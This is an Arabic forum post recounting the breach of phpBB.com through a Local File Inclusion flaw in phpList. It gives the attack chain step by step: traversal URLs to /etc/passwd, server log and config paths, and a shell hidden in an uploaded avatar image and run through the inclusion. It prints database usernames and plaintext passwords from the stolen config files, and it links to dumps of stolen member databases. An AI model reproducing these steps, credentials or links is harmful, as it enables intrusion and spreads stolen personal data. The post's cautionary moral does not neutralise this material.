منتديات اشراق العالم

السلام عليكم ...

بصراحة اليوم فاجئني خبر من صديق لي يقلي على إختراق موقع البرنامج الشهير www.phpBB.com

حيث انه قام بإختراقها بأسهل طريقة لم تتوقع ! عن طريق برنامج الPHPlist المعروف ايضا ولاكن للاسف قبل ايام قليلة

طرحت ثغره فيه بلميلورم

الثغره عبارة عن Local File Inclusion Exploit حيث قام المخترق بلولوج لملف ال/etc/passwd لسيرفر البرنامج عن طريق الامر

كود:
http://www.phpbb.com/lists/admin/ind.../../etc/passwd
والملف طبعا تم رفعه على الرايبد شير

كود:
http://rapidshare.com/files/192159914/etc.txt
ومن ثم توجه الى ملف الاباتشي لمعرفه مسار الموقع

كود:
/etc/httpd/conf/httpd.conf
وتم الوصول لملف الإيرر

كود:
/home/logs/phpbb.com/error_log
ومن ثم تم معرفة مسار منتديات الphpBB

كود:
home/virtual/phpbb.com/community
ومعروف عن منتديات الphpBB انك تستطيع حقن كود (شيل) بملف الerror log , ولو تركب منتدى phpBB بجهازك تشوف المسار يكون كدا

كود:
/home/virtual/phpbb.com/community/images/avatars/upload
وثم تم حقن الكود (شيل) عن طريق رفع الصورة

كود:
(secret hash)_userid.jpg
ومن ثم قام بمعرفة السيكريت كود حق الشل ( الصورة ) عن طريقة ملف الإيرر لوج الي تم إيضاحه مسبقا

كود:
f51ee61fe7a83fdf72780912bced0855
وبعدها يصير كل مايبي يشغل الكود ( الشيل ) بلطريقة هذه ( مثل تخطي المود سيكيورتي)..

كود:
/../../../../../../home/virtual/phpbb.com/community/images/avatars/upload/f51ee61fe7a83fdf72780912bced0855_ID.jpg
وهذه الطريقة كان المخترق بيمتحن سيرفرهم اذا تمشي عليهم ام لا ... بحيث كان السكربت يقرا الكونفيج

كود:
/home/virtual/phpbb.com/community/config.php
كود:
$dbms = 'mysqli';
$dbhost = 'phpbb.db.osuosl.org';
$dbport = '';
$dbname = 'phpbb';
$dbuser = 'phpbb2';
$dbpasswd = 'saxM9nfRjLbJ2Yy5';
$table_prefix = 'community_';
وتم قرائة ملف الكونفيج لبرنامج الPHPLIST :dالمصيبة هذا هع هع
كود:
$database_host = "localhost";
$database_name = "phpbb_phplist";
$database_user = 'phplist';
$database_password = 'Berti3_Danc3';
طبعا هذه الطريقة شرحتها لكم من موقع قام بعمله على الرابط http://hackedphpbb.blogspot.com/

وبلنهاية تم سحب باسووردات الاعضاء اكثر من 200.000 الف عضو بلإضافة الى باسووردات وايميلات مشتركين بنحو

400.000 الف عضو ! والمصيبة انه باسوورداتهم كلها كلير تكست !!!!

وهذه القواعد ومعلومات الأعضاء وايميلاتهم تم رفعها على الرايبد شير

كود:
http://rapidshare.com/files/192305758/out.txt
http://rapidshare.com/files/192304153/phpbb_users.sql
http://hackedphpbb.pastebin.com/f1399b3e8
http://rapidshare.com/files/192261517/backup_sql.gz

وبلنهاية رسالتهم من الموقع !

كود:
Maintenance

We are sorry to report that we have been attacked through a vulnerability in an outdated PHPList installation. phpBB.com and related sites will remain unavailable while we work to recover. No vulnerabilities have been found in the phpBB software itself.

You can download phpBB here: http://www.ohloh.net/p/phpbb

You can get support at the temporary support forums or on IRC: chat.freenode.net #phpbb

– the phpBB team
ونتمنى من الاخوة اخذ الإختراق هذا موعظة لعدم نسيان او التهاون بوجود ملفات قديمة بلمنتدى !

حيث انه المخترق كان عضو قديم بلمنتدى وتذكر ! انه الموقع يحتوي على البرنامج المصاب !

وقام المخترق بتوضيح إختراقه للموقع حيث قال

كود:
-----------------------------------UPDATE
to all that same i am a script kiddie, **** you
phpbb, i did not alter any files on your server, everything i gained access to has been listed in this blog
تحياتي !

:nice:
المصـــدر